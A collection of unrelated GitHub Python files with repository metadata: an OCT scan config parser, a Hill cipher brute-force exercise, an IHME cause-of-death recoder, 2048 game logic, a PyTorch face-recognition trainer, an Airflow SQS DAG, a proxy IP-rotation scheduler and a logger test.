**temp_config_dict} # combine dictionaries from all sections together\n return config_dict\n else:\n config_dict = {}\n for key, val in config[section_title].items():\n if key in key_type:\n config_dict[key] = key_type[key](val)\n else:\n try:\n config_dict[key] = float(val)\n except ValueError:\n config_dict[key] = val\n return config_dict\n\n\n @staticmethod\n def return_num_scanlines(xml_file=None, scan_params=None):\n if xml_file is None:\n if scan_params is None:\n raise ('Both inputs can\\'t be None')\n else:\n num_scans_to_view = np.size(np.arange(scan_params['top_crd'], scan_params['top_crd'] - scan_params['scan_height'], -scan_params['hatch_spacing']))\n return int(num_scans_to_view)\n else:\n 
ec1000_commands = OCTScanConfig.return_list_of_xml_commands(xml_file)\n return_number_of_jump_commands = 0\n for child in ec1000_commands:\n if child.tag.lower() == 'JumpAbs'.lower():\n return_number_of_jump_commands += 1\n\n return int(return_number_of_jump_commands / 2)\n\n @staticmethod\n def return_list_of_xml_commands(xml_file=None):\n with open(xml_file, 'r') as f:\n xml_string = f.read()\n # open xml file and parse\n try:\n tree = ET.parse(xml_string)\n root = tree.getroot()\n except: # if it doesn't have overarching tag, then add it\n xml_string = \"\\n\" + xml_string + \"\\n\"\n root = ET.fromstring(xml_string)\n xml_commands = list(root)\n return xml_commands\n","repo_name":"Adam-D-Lewis/OCT_Workflow_Package","sub_path":"Pipe_And_Filter_Autosection/classes/OCTScanConfig.py","file_name":"OCTScanConfig.py","file_ext":"py","file_size_in_byte":5804,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"74651651953","text":"####################################################################################################\n# Dec_Hill.py\n# Hill2x2 decryption functions\n# Written by - Ravi Padma\n####################################################################################################\nimport random\ndef c2i(character):\n #print('c2i:',ord(character)-ord('a'))\n return ord(character)-ord('A')\n\ndef i2c(encoded):\n #print('i2c:',chr(ord('a') + encoded))\n return chr(ord('a') + encoded)\n\ndef fitness(sometext):\n score=0\n fitwords= [\"the\", \"of\", \"and\", \"to\", \"in\", \"is\", \"you\", \"that\", \"there\", \"it\", \"he\", \"she\", \"was\", \"for\", \"on\", \"are\", \"as\", \"with\", \"his\", \"they\", \"at\", \"be\", \"this\", \"have\", \"from\", \"if\", \"were\", \"their\", \"him\", \"her\"]\n\n for word in fitwords:\n score += sometext.count(word)*len(word)\n #print(score)\n return score\n\ndef hill_enc(plain):\n found = False\n a=1\n b=1\n c=1\n d=1\n while not found:\n a,b,c,d = [random.randint(0,25) for i in range(4)]\n det = (ad - bc) % 26\n det2 = ((a-1)*d - b*(c-1)) % 26\n if (det % 2 != 0 ) and (det % 13 != 0) and (det2 % 26 != 0):\n found = True\n secret = ''\n for i in range(0, len(plain), 2):\n i1 = c2i(plain[i])\n i2 = c2i(plain[i+1])\n c1 = (i1*a + i2*b) % 26\n c2 = (i1*c + i2*d) % 26\n secret += i2c(c1) + i2c(c2)\n return secret, [a,b,c,d]\n\ndef hill_dec(inplain, a,b,c,d):\n secret = ''\n for i in range(0, len(inplain), 2):\n i1 = c2i(inplain[i])\n i2 = c2i(inplain[i+1])\n c1 = (i1*a + i2*b) % 26\n c2 = (i1*c + i2*d) % 26\n secret += i2c(c1) + i2c(c2)\n #secret += c2i(c1) + c2i(c2)\n return secret\n\nCT1='tswenajgdnaxwhswurmdbagkitxuyofqnkormdsrxdlmpkdkxdootvysewdiagkkguzbvqwexdrayqnajqzqtsxdvgtsgqcvqbfeatgqgvdwweuuztxddwakevhhlmqotosokzrufetscxucurdiveuuhzcivtukrdvquhbwvgiaanaxxdlcwgmcvzjekygijitswscocvyffopcxdlmswrdxdwumdhzwklmswrdqragkyewitbamwwezhweqemdklxdxyjgavbaxdgiirqswviraguhvtkzvmjejukyefsfirqszjwgdwtsugxuxdnkoopohygitiurdikbegypfeibhzmgklcopcyvcrtsirelmsbaugywvtbescavoraggnbecoaxkbnpwvdiavhhawatbaytxuaxagkbhzwvezxudikynawlajmdtypdkzitpobonkxdlmziiryhicaxkbapawkpkbqkopicklfecbksyfsfbcjlbonkxdlmziirivryfemqejxuirurtljetiwuzbycrkpdwkseicmdsrcmlkvgeyjicebrgioqcvituxqkdxnkweqrwedicxqfbe'\n\nI=0\nbestscor=0\nTEXT=CT1.upper()\nprint(TEXT)\nfor a in range(26):\n for b in range(26):\n for c in range(26):\n for d in range(26):\n score=fitness(hill_dec(TEXT,a,b,c,d))\n if (a > I):\n I=a\n print (I)\n if (score > bestscor):\n print(score,hill_dec(TEXT, a, b, c, d))\n 
bestscor=score","repo_name":"ravpad/23S-CPEG672-610","sub_path":"Module 1 Black Hat Challenge/Dec_Hill.py","file_name":"Dec_Hill.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"39615568964","text":"\nimport pandas as pd\nimport numpy as np\n\nfrom cod_prep.claude.cod_process import CodProcess\nfrom cod_prep.downloaders.causes import (\n add_cause_metadata,\n get_all_related_causes\n)\nfrom cod_prep.downloaders.nids import add_nid_metadata\nfrom cod_prep.claude.configurator import Configurator\nimport warnings\n\nclass Recoder(CodProcess):\n\n id_cols = ['nid', 'extract_type_id', 'location_id', 'year_id',\n 'age_group_id', 'sex_id', 'cause_id',\n 'site_id']\n val_cols = ['deaths', 'deaths_rd', 'deaths_corr', 'deaths_raw']\n\n def __init__(self, cause_meta_df, source, code_system_id, data_type_id):\n self.source = source\n self.code_system_id = code_system_id\n self.data_type_id = data_type_id\n self.cause_meta_df = cause_meta_df\n self.conf = Configurator(\"standard\")\n self.vr_indicators_path = self.conf.get_resource('vr_indicators')\n self.cache_options = {\n 'force_rerun': False,\n 'block_rerun': True,\n 'cache_results': False,\n 'cache_dir': self.conf.get_directory('db_cache')\n }\n\n def get_computed_dataframe(self, df):\n\n if 'data_type_id' not in df.columns:\n df = add_nid_metadata(df, \"data_type_id\", **self.cache_options)\n df = self.recode(df)\n df = self.conform_secret_causes(df)\n df = self.clean_up(df)\n\n return df\n\n def get_diagnostic_dataframe(self):\n \"\"\"Return diagnostics.\"\"\"\n pass\n\n def recode_sids(self, df):\n path_to_4_stars_sheet = self.conf.get_resource(\"four_star_locations\")\n four_five_star_locs = pd.read_csv(path_to_4_stars_sheet)\n four_five_star_locs = four_five_star_locs[['location_id']]\n four_five_star_locs = four_five_star_locs.location_id.unique()\n less_than_four_star = ~df['location_id'].isin(four_five_star_locs)\n is_sids = df['cause_id'] == 686\n df.loc[is_sids & less_than_four_star, 'cause_id'] = 380\n return df\n\n def clean_up(self, df):\n \"\"\"Group rogue duplicates.\"\"\"\n df = df.groupby(self.id_cols, as_index=False)[self.val_cols].sum()\n return df\n\n def conform_secret_causes(self, df):\n\n df = add_cause_metadata(\n df, add_cols=['secret_cause', 'parent_id'],\n cause_meta_df=self.cause_meta_df,\n **self.cache_options\n )\n injuries_replace_parents = [722, 720, 719]\n replaced_injuries = df['cause_id'].isin(injuries_replace_parents)\n df.loc[replaced_injuries, 'parent_id'] = 723\n secret_causes = df['secret_cause'] == 1\n not_cc_code = df['cause_id'] != 919\n len_before = len(df)\n if df['parent_id'].isnull().values.any():\n raise AssertionError(\n 'There are missing parent cause_ids'\n )\n df.loc[secret_causes & not_cc_code, 'cause_id'] = df['parent_id']\n len_after = len(df)\n if len_before != len_after:\n raise AssertionError(\n 'The length of the dataframe has changed from {} to {}'.format(\n len_before, len_after\n )\n )\n df.drop(['parent_id', 'secret_cause'], axis=1, inplace=True)\n return df\n\n def drop_leukemia_subtypes(self, df):\n\n leuk_subtypes = get_all_related_causes('neo_leukemia', self.cause_meta_df)\n\n leuk_subtypes.remove(487)\n\n df.loc[\n (df['cause_id'].isin(leuk_subtypes)) & (df['deaths_rd'] > 0) &\n (df['deaths_raw'] <= 0), 'cause_id'\n ] = 487\n\n return df\n\n \n def recode(self, df):\n \n cause_metadata_df = self.cause_meta_df\n cause_metadata_df = cause_metadata_df[[\"cause_id\",\n 
\"path_to_top_parent\",\n \"acause\"]]\n ckd_cause_ids = get_all_related_causes('ckd', cause_metadata_df)\n ckd_cause_ids.remove(593)\n ckd_less_other = df['cause_id'].isin(ckd_cause_ids)\n neonate = df['age_group_id'].isin([2, 3])\n df.loc[ckd_less_other & neonate, 'cause_id'] = 652\n\n resp_ids = [509, 515, 516, 520]\n is_cert_resp_causes = df['cause_id'].isin(resp_ids)\n\n df.loc[is_cert_resp_causes & neonate, 'cause_id'] = 322\n\n is_asthma = df['cause_id'] == 515\n df.loc[is_asthma & (df['age_group_id'] == 4), 'cause_id'] = 322\n\n maternal_cause_ids = get_all_related_causes(366, cause_metadata_df)\n maternal_cause_ids = df['cause_id'].isin(maternal_cause_ids)\n\n non_maternal_ages = np.logical_not(\n df['age_group_id'].isin([7, 8, 9, 10, 11, 12, 13, 14, 15, 22])\n )\n df.loc[maternal_cause_ids & non_maternal_ages, 'cause_id'] = 919\n\n alzheimers = df['cause_id'] == 543\n under_40 = df['age_group_id'].isin(range(1, 13, 1))\n df.loc[alzheimers & under_40, 'cause_id'] = 919\n\n cong_causes = get_all_related_causes('cong', cause_metadata_df)\n congenital = df['cause_id'].isin(cong_causes)\n over_70 = df['age_group_id'].isin([19, 20, 30, 31, 32, 235])\n df.loc[congenital & over_70, \"cause_id\"] = 919\n\n hepatitis = get_all_related_causes(400, cause_metadata_df)\n hepatitis = df['cause_id'].isin(hepatitis)\n if self.code_system_id in [7, 9]:\n df.loc[hepatitis & neonate, \"cause_id\"] = 380\n else:\n df.loc[hepatitis & neonate, \"cause_id\"] = 384\n\n inj_disaster_light = df['cause_id'] == 984\n df.loc[inj_disaster_light, 'cause_id'] = 716\n\n if self.code_system_id not in [1, 6]:\n ckd_diabetes = df['cause_id'].isin([997, 998])\n df.loc[ckd_diabetes, 'cause_id'] = 589\n\n if self.code_system_id not in [1, 6, 9]:\n diabetes_subtypes = df['cause_id'].isin([975, 976])\n df.loc[diabetes_subtypes, 'cause_id'] = 587\n\n diabetes_type_2 = df['cause_id'] == 976\n under_15 = df['age_group_id'] < 8\n df.loc[diabetes_type_2 & under_15, 'cause_id'] = 975\n\n iron_or_iodine = df['cause_id'].isin([388, 390])\n df.loc[iron_or_iodine, 'cause_id'] = 919\n\n under_1 = df['age_group_id'] < 5\n cvd_ihd = df['cause_id'] == 493\n df.loc[cvd_ihd & under_1, 'cause_id'] = 643\n\n if 686 in df.cause_id.unique():\n df = self.recode_sids(df)\n\n df.loc[df.cause_id.isin([344, 409, 410,\n 542, 558, 669,\n 680, 961]), 'cause_id'] = 919\n\n if self.data_type_id not in [6, 7, 8]:\n df.loc[df['cause_id'] == 687, 'cause_id'] = 919\n\n one_to_14 = df['age_group_id'].isin([5, 6, 7])\n cvd_ihd = df['cause_id'] == 493\n df.loc[cvd_ihd & one_to_14, 'cause_id'] = 507\n\n cancer_recodes = get_all_related_causes([411, 414, 423, 426, 429, 432,\n 435, 438, 441, 444, 450, 453,\n 456, 459, 462, 465, 468, 474,\n 486, 483], cause_metadata_df)\n cancer_recodes = df['cause_id'].isin(cancer_recodes)\n cancer_ages = df['age_group_id'].isin(range(2, 8, 1))\n df.loc[cancer_recodes & cancer_ages, \"cause_id\"] = 489\n\n not_icd10 = self.code_system_id != 1\n neo_meso = df['cause_id'] == 483\n df.loc[neo_meso & not_icd10, \"cause_id\"] = 489\n\n if self.source.endswith(\"AAMSP\"):\n digest_hernia = df['cause_id'].isin([531])\n df.loc[digest_hernia, \"cause_id\"] = 919\n\n\n if self.source == \"\":\n homicide_and_suicide = df['cause_id'].isin([724, 725, 726, 727, 941,\n 718, 719, 720, 721, 722, 723])\n bad_years = df['year_id'].isin(range(2007, 2015))\n # _unintent\n df.loc[bad_years & homicide_and_suicide, \"cause_id\"] = 919\n\n\n inj_war = get_all_related_causes(945, cause_metadata_df)\n is_inj_war = df['cause_id'].isin(inj_war)\n jamaica 
= df['location_id'] == 115\n year_2005 = df['year_id'] == 2005\n vr = df['data_type_id'] == 9\n df.loc[is_inj_war & jamaica & year_2005 & vr, 'cause_id'] = 724\n\n inj_mech_gun = df['cause_id'] == 705\n year_2006 = df['year_id'] == 2006\n df.loc[inj_mech_gun & year_2006 & jamaica & vr, 'cause_id'] = 724\n\n if self.source == \"ICD10\":\n digest_ibd = df['cause_id'] == 532\n suriname = df['location_id'] == 118\n year_1995_2012 = df['year_id'].isin(range(1995, 2013, 1))\n df.loc[digest_ibd & suriname & year_1995_2012, 'cause_id'] = 526\n\n endo_prodcedural = df['cause_id'] == 624\n df.loc[endo_prodcedural, 'cause_id'] = 708\n\n\n schizo = df['cause_id'] == 559\n tibet = df['location_id'] == 518\n df.loc[schizo & tibet, 'cause_id'] = 919\n\n hiv = get_all_related_causes(298, cause_metadata_df)\n hiv = df['cause_id'].isin(hiv)\n pre_1980 = df['year_id'] < 1980\n df.loc[hiv & pre_1980, 'cause_id'] = 919\n\n diabetes_causes = get_all_related_causes(587, cause_metadata_df)\n diabetes = df['cause_id'].isin(diabetes_causes)\n df.loc[neonate & diabetes, 'cause_id'] = 380\n\n under_20 = df['age_group_id'].isin(range(0, 8, 1))\n stroke = get_all_related_causes(\n 'cvd_stroke', cause_metadata_df\n )\n stroke_deaths = df['cause_id'].isin(stroke)\n va = df['data_type_id'] == 8\n \n df.loc[under_20 & stroke_deaths & va, 'cause_id'] = 491\n\n over_95 = df['age_group_id'] == 235\n inj_trans_road_pedal = df['cause_id'] == 691\n df.loc[over_95 & inj_trans_road_pedal, 'cause_id'] = 919\n\n df.loc[schizo, 'cause_id'] = 919\n\n if self.source == \"Russia_FMD_1999_2011\":\n cvd_pvd = df['cause_id'] == 502\n df.loc[cvd_pvd, 'cause_id'] = 491\n\n if self.source == \"\":\n sui_homi_causes = [717, 718, 719, 720, 721, 722, 723,\n 724, 725, 726, 727, 941]\n sui_homi = df['cause_id'].isin(sui_homi_causes)\n bad_years = df['year_id'].isin(range(2007, 2015))\n df.loc[sui_homi & bad_years, 'cause_id'] = 919\n\n if \"India_MCCD\" in self.source:\n non_neonates = np.logical_not(df['age_group_id'].isin([2, 3]))\n neonatal_sepsis = df['cause_id'].isin([])\n df.loc[non_neonates & neonatal_sepsis, 'cause_id'] = 380\n\n if self.source == \"India_SCD_states_rural\":\n warnings.warn(\"Implement SCD rd artifact recode\")\n\n\n inj_war_execution = df['cause_id'] == 854\n\n if self.source == \"ICD9_BTL\":\n ecuador = df['location_id'] == 122\n year_1980_1990 = df['year_id'].isin(range(1980, 1991, 1))\n df.loc[inj_war_execution & ecuador & year_1980_1990,\n 'cause_id'] = 855\n\n bih = df['location_id'] == 44\n year_1985_1991 = df['year_id'].isin([1985, 1986, 1987, 1988,\n 1989, 1990, 1991])\n df.loc[inj_war_execution & bih &\n year_1985_1991, 'cause_id'] = 855\n\n warnings.warn(\"BTL cancer recode needed\")\n\n if self.source == \"ICD10\":\n irq = df['location_id'] == 143\n year_2008 = df['year_id'] == 2008\n df.loc[inj_war_execution & year_2008 & irq, 'cause_id'] = 855\n\n if self.source == \"ICD9_detail\":\n if ((df['location_id'] == 43) & (df['year_id'] == 1997)).any():\n warnings.warn(\"Albania homicide recode needed\")\n\n if self.source == \"ICD9_USSR_Tabulated\":\n warnings.warn(\"Missing some homicide fixes for TJK, ARM here.\")\n\n df = self.drop_leukemia_subtypes(df)\n\n if self.data_type_id in [1, 3, 5, 7]:\n maternal_causes = get_all_related_causes('maternal', cause_metadata_df)\n injury_causes = get_all_related_causes('_inj', cause_metadata_df)\n maternal = df['cause_id'].isin(maternal_causes)\n inj = df['cause_id'].isin(injury_causes)\n df.loc[~(maternal | inj), 'cause_id'] = 919\n\n if self.data_type_id == 5:\n 
df.loc[~maternal, 'cause_id'] = 919\n\n return df\n","repo_name":"ihmeuw/ihme-modeling","sub_path":"gbd_2017/shared_code/cod_database/06_Misclassification_correction/recode.py","file_name":"recode.py","file_ext":"py","file_size_in_byte":12327,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"39"} +{"seq_id":"6692277054","text":"from random import choice, randint\nfrom copy import deepcopy\n\n# adds to direction given as string: RIGHT, LEFT, UP, DOWN\ndef addTheGrid(map, direction): \n\n if direction == 'RIGHT':\n for c in range(len(map)):\n for m in range(3, 0, -1):\n for k in range(1, 1 + m):\n if map[c][m] == map[c][m-k] and map[c][m] != 0:\n map[c][m] += 1\n map[c][m - k] = 0\n break\n elif map[c][m] != map[c][m-k] and map[c][m] != 0 and map[c][m-k] != 0: break\n\n elif direction == 'LEFT': \n for c in range(len(map)):\n for m in range(0, 3):\n for k in range(1, 4 - m):\n if map[c][m] == map[c][m+k] and map[c][m] != 0:\n map[c][m] += 1\n map[c][m + k] = 0 \n break\n elif map[c][m] != map[c][m+k] and map[c][m] != 0 and map[c][m+k] != 0: break\n \n elif direction == 'UP': \n for m in range(len(map[0])):\n for c in range(0, 3):\n for k in range(1, 4 - c):\n if map[c][m] == map[c+k][m] and map[c][m] != 0:\n map[c][m] += 1\n map[c + k][m] = 0 \n break\n elif map[c][m] != map[c+k][m] and map[c][m] != 0 and map[c+k][m] != 0: break\n\n elif direction == 'DOWN': \n for m in range(len(map[0])):\n for c in range(3, 0, -1):\n for k in range(1, 1 + c):\n if map[c][m] == map[c-k][m] and map[c][m] != 0:\n map[c][m] += 1\n map[c - k][m] = 0 \n break\n elif map[c][m] != map[c-k][m] and map[c][m] != 0 and map[c-k][m] != 0: break\n\n\n# then moves the numbers to empty boxes to direction given as string: RIGHT, LEFT, UP, DOWN\ndef moveTheGrid(map, direction):\n if direction == 'RIGHT':\n for i in range(len(map)):\n for m in range(2, -1, -1): \n for k in range(3, m, -1):\n if map[i][k] == 0:\n map[i][k] = map[i][m]\n map[i][m] = 0\n break\n \n elif direction == 'LEFT':\n for i in range(len(map)):\n for m in range(1, 4): \n for k in range(m):\n if map[i][k] == 0:\n map[i][k] = map[i][m]\n map[i][m] = 0\n break\n\n elif direction == 'UP':\n for i in range(len(map)):\n for m in range(1, 4):\n for k in range(m):\n if map[k][i] == 0:\n map[k][i] = map[m][i]\n map[m][i] = 0\n break\n\n elif direction == 'DOWN':\n for i in range(len(map)):\n for m in range(2, -1, -1): \n for k in range(3, m, -1):\n if map[k][i] == 0:\n map[k][i] = map[m][i]\n map[m][i] = 0\n break\n\n\n# firstly calls addTheGrid() function to add the necessary boxes\n# then calls moveTheGrid() function to fill in the empty boxes\n# returns true if a move is made, false if no move is made\ndef setNewGrid(map, direction):\n fmap = deepcopy(map)\n addTheGrid(map, direction)\n moveTheGrid(map, direction)\n if fmap == map:\n return False\n return True\n\n\n# creates a new number on the grid\ndef randomNumberGeneration(map):\n emptyspots = []\n for i in range(4):\n for m in range(4):\n if map[i][m] == 0: emptyspots.append((i, m))\n \n randomIndex = choice(emptyspots)\n\n # chosing randomly between 4 or 2, chance for 2 is 90%, chance for 4 is 10%\n twoOrFour = randint(1, 10)\n if twoOrFour > 9: map[randomIndex[0]][randomIndex[1]] = 2\n else: map[randomIndex[0]][randomIndex[1]] = 1\n\n# checks if there are any available moves\ndef checkIfLost(map):\n copy1, copy2, copy3, copy4 = [deepcopy(map) for i in range(4)]\n setNewGrid(copy1, \"RIGHT\")\n setNewGrid(copy2, \"LEFT\")\n setNewGrid(copy3, \"UP\")\n 
setNewGrid(copy4, \"DOWN\")\n\n # returns True if both of the copies are same as initial grid\n if copy1 == map and copy2 == map and copy3 == map and copy4 == map:\n return True\n return False ","repo_name":"EgeSaykan/2048-AI","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"17986659091","text":"import torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import transforms\nfrom Conv2model import Conv2Model\nfrom read import ReadHandler\nfrom torch.utils.data import DataLoader \nfrom torch.utils.data import TensorDataset\nfrom torch.autograd import Variable\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") #使用cuda\nnum_epoch=20\nnum_classes=68,\nbatch_size=20\nlearning_rate=0.001\n\nfile_list=['05','07','09','27','29']\ntrain_feature=[0]*5\ntrain_target=[0]*5\nfor i in range(5):\n readfile=ReadHandler('PIE dataset/Pose{id}_64x64.mat'.format(id=file_list[i]))\n train_feature[i],train_target[i]=readfile.read_train()\n train_feature[i]=torch.Tensor(train_feature[i]).view(-1,1,64,64).float().to(device)\n train_target[i]=torch.Tensor(train_target[i]).long().to(device)\n print(len(train_target[i]))\n\nread_feature=torch.cat((train_feature[0],train_feature[1],train_feature[2],train_feature[3],train_feature[4]),0)\nread_target=torch.cat((train_target[0],train_target[1],train_target[2],train_target[3],train_target[4]),0)\ntrain_feature=read_feature\ntrain_target=read_target\nprint(train_feature.shape,train_target.shape)\n\n\ntrain_dataset= TensorDataset(train_feature,train_target)\ntrain_loader=DataLoader(train_dataset,batch_size=batch_size,shuffle=True)\n\n\nmodel=Conv2Model().to(device)\ncriterion = torch.nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters(),lr=learning_rate)\n\ntotal=len(train_target)\n\nfor epoch in range(num_epoch):\n total_correct=0\n for step,(feature,target) in enumerate(train_loader):\n feature=Variable(feature)\n target=Variable(target)\n\n output=model(feature)\n loss=criterion(output,target)\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n batch_size=target.size(0)\n _,predict=torch.max(output,1)\n total_correct+=(predict==target).sum().item()\n print('epoch:{} accuracy:{}'.format(epoch+1,total_correct/total))\ntorch.save(model.state_dict(),'gyc_all_conv2d.pt')\n","repo_name":"LayunGotze/FaceRecognitionPIE","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"28503050007","text":"import json\nimport logging\n\nfrom airflow import DAG\nfrom dag_utils import task_fail_slack_alert_callback\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.contrib.sensors.aws_sqs_sensor import SQSSensor\nfrom airflow.utils.dates import days_ago\nfrom datetime import timedelta\nfrom data_pipeline.config import conf\nfrom data_pipeline.db.postgresql import connect_postgresql, update_verified_data\n\n# Logger\nlogging.basicConfig(format='%(asctime)s %(filename)s %(funcName)s %(lineno)d %(message)s')\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\ndef process_sqs_events(event: dict):\n \"\"\"\n Function to process the SQS events received by the Lambda handler\n\n Args:\n event (dict): SQS event object\n\n 
Returns:\n verified_data (list):\n\n \"\"\"\n verified_data = []\n for message in event.get('Messages'):\n data = json.loads(message.get('Body'))\n verified_data.append(data)\n return verified_data\n\n\ndef sync_verified_data_func(context):\n \"\"\"\n Function to parse the SQS message\n Args:\n context:\n\n Returns: None\n\n \"\"\"\n sqs_message = context.get('task_instance').xcom_pull('sqs_message_sensor_task', key='messages')\n logger.info(sqs_message)\n verified_data = process_sqs_events(sqs_message)\n if verified_data:\n pg_connection = connect_postgresql()\n for data in verified_data:\n res = update_verified_data(\n pg_connection,\n data.get('entity'),\n data.get('company_id'),\n data.get('external_id'),\n data.get('verified_data'),\n )\n if res:\n logger.info(\n f'''Successfully updated the verified_data in `verified_{data.get('entity')}`\n table for (company_id - {data.get('company_id')}, external_id - {data.get('external_id')})'''\n )\n else:\n logger.info(\n f'''Failed to update the verified_data in `verified_{data.get('entity')}`\n table for (company_id - {data.get('company_id')}, external_id - {data.get('external_id')})'''\n )\n\n\ndefault_args = {\n 'owner': 'Airflow',\n 'start_date': days_ago(30),\n 'depends_on_past': False,\n 'retries': 0,\n 'on_failure_callback': task_fail_slack_alert_callback,\n}\n\nsqs_sensor_dag = DAG(\n 'SQS_VERIFIED_DATA_SYNC_SENSOR_DAG',\n default_args=default_args,\n schedule_interval=timedelta(minutes=2),\n max_active_runs=1,\n)\n\nsqs_message_sensor_task = SQSSensor(\n dag=sqs_sensor_dag,\n task_id='sqs_message_sensor_task',\n aws_conn_id=conf.get('AWS_CONN_ID', None),\n wait_time_seconds=10,\n sqs_queue=conf.get('SQS_SYNC_VERIFIED_DATA_QUEUE_URL', None),\n)\n\nsync_verified_data_task = PythonOperator(\n task_id='sync_verified_data_task',\n dag=sqs_sensor_dag,\n python_callable=sync_verified_data_func,\n provide_context=True,\n)\n\nsqs_message_sensor_task >> sync_verified_data_task\n","repo_name":"grohan2002/datapipeline-dags","sub_path":"sqs_sync_verified_data_dag.py","file_name":"sqs_sync_verified_data_dag.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16585155487","text":"# -*- coding: utf-8 -*-\nimport argparse\n\nimport logging\nfrom subprocess import Popen, PIPE\nimport time\n\nimport cipip as pyipip\nimport requests\n\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass STATE(object):\n INIT = 0\n OK = 1\n CHANGING = 2\n\n\nclass Aso100Scheduler(object):\n\n def __init__(self, options):\n self.options = options\n self.currentIp = ''\n self.previousIp = ''\n\n # self.state = STATE.INIT\n self.state = STATE.OK\n\n self.workCount = 0\n\n self.controlHandle = None\n self.proxyHandle = None\n\n # self.controlTunnel()\n\n self.ipip = None\n\n def controlTunnel(self):\n cmd = '/usr/bin/ssh -vTN {} -L 127.0.0.1:{}:127.0.0.1:{} {}@{}'\n identity = ''\n cmd = cmd.format(\n identity,\n self.options.local_proxy_port,\n self.options.remote_proxy_port,\n self.options.remote_user,\n self.options.remote_host,\n )\n self.controlHandle = p = Popen(\n cmd, shell=True, stdout=PIPE, stderr=PIPE)\n\n def oneRun(self):\n\n # FIXME: STATE == CHANGING 状态太久的话需要有个处理\n\n currentIp = self.getIp()\n LOGGER.error('currentIp: %s', currentIp)\n\n if not currentIp:\n return\n\n self.currentIp = currentIp\n\n if self.previousIp != self.currentIp:\n geo1 = self.geoip(self.previousIp)\n LOGGER.error('before %s %s', self.previousIp, geo1)\n geo2 = 
self.geoip(self.currentIp)\n LOGGER.error('after %s %s', self.currentIp, geo2)\n self.changePost()\n return\n\n if self.previousIp == self.currentIp:\n if self.needChange():\n LOGGER.error('>>> do change')\n if not self.changeIp():\n LOGGER.error('!!! change req failed!!!')\n return\n\n def postRun(self):\n self.previousIp = self.currentIp\n\n def loop(self):\n\n while True:\n ip = self.getIp()\n if ip:\n break\n\n self.previousIp = ip\n\n while True:\n self.oneRun()\n self.postRun()\n self.doWork()\n\n time.sleep(3)\n\n def needChange(self):\n if self.state == STATE.CHANGING:\n LOGGER.error('>>> IN CHANGING, skip')\n return False\n\n if self.workCount >= 3:\n LOGGER.error('>>> workCount exceeded !!!')\n return True\n\n LOGGER.error('>>> no need to change')\n return False\n\n def changePost(self):\n self.state = STATE.OK\n self.workCount = 0\n\n def doWork(self):\n if self.state == STATE.CHANGING:\n LOGGER.error('!! IN CHANGING, skip work')\n return\n\n self.workCount += 1\n LOGGER.error('>> doWork, count: %s', self.workCount)\n\n def getIp(self):\n try:\n resp = requests.get(\n 'http://127.0.0.1:3000/get-public-ip', timeout=15)\n if resp.status_code == 200:\n rv = resp.text.strip()\n return rv\n except requests.exceptions.Timeout as err:\n LOGGER.error('getIp timeout')\n except requests.exceptions.RequestException as err:\n LOGGER.exception(str(err))\n\n return ''\n\n def changeIp(self):\n rv = False\n try:\n resp = requests.get(\n 'http://127.0.0.1:3000/change-public-ip', timeout=15)\n self.state = STATE.CHANGING\n rv = resp.status_code == 202\n except requests.exceptions.Timeout as err:\n LOGGER.error('changeIp timeout')\n except requests.exceptions.RequestException as err:\n LOGGER.exception(str(err))\n\n return rv\n\n def geoip(self, ip):\n db = self.options.ipipx_database\n rv = ''\n if not db:\n return rv\n\n if self.ipip is None:\n self.ipip = pyipip.IPIPXDatabase(db)\n\n rv = self.ipip.lookup(ip)\n return rv\n\n\nap = argparse.ArgumentParser()\nap.add_argument('--remote-host', default='tmp')\nap.add_argument('--identity-file')\nap.add_argument('--local-proxy-port', type=int, default=3000)\nap.add_argument('--remote-proxy-port', type=int, default=3000)\nap.add_argument('--remote-user', default='root')\nap.add_argument('--ipipx-database')\n\noptions = ap.parse_args()\n\nscheduler = Aso100Scheduler(options)\n# 需要等连接开始\n# LOGGER.error('>>> wait tunnel to connect')\n# time.sleep(5)\n# LOGGER.error('>>> start work')\nscheduler.loop()\n","repo_name":"GSIL-Monitor/snippets","sub_path":"python/misc/aso100-scheduler.py","file_name":"aso100-scheduler.py","file_ext":"py","file_size_in_byte":4540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16957255277","text":"import pytest\n\nfrom data_linter.logging_functions import logging_setup\n\n\n@pytest.mark.parametrize(\"context\", [\"\", \"VALIDATION\"])\ndef test_logger(context):\n log, log_stringio = logging_setup()\n test_message = \"test message\"\n expected_str_end = f\"| PROCESSING | {test_message}\\n\"\n if context:\n expected_str_end = expected_str_end.replace(\"PROCESSING\", context)\n log.info(test_message, extra={\"context\": context})\n else:\n log.info(test_message)\n\n test_out = log_stringio.getvalue()\n\n assert 
